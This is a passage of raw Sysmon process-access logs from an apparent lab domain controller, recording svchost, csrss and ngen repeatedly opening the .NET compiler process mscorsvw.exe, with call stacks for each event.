13:21:47.679{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-DC01-000000009A01}4388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.664{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456B-6000-DC01-000000009A01}4388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.664{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-DC01-000000009A01}4388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.617{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-DB01-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.601{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456B-6000-DB01-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.601{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-DB01-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-DA01-000000009A01}4016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.539{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456B-6000-DA01-000000009A01}4016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.539{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-DA01-000000009A01}4016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.508{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-D901-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.492{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456B-6000-D901-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.492{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-D901-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.445{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-D801-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.429{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456B-6000-D801-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.429{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-D801-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.351{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-D701-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.336{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456B-6000-D701-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.336{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-D701-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-D601-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.289{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456B-6000-D601-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.289{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-D601-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-D501-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.211{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456B-6000-D501-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-D501-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\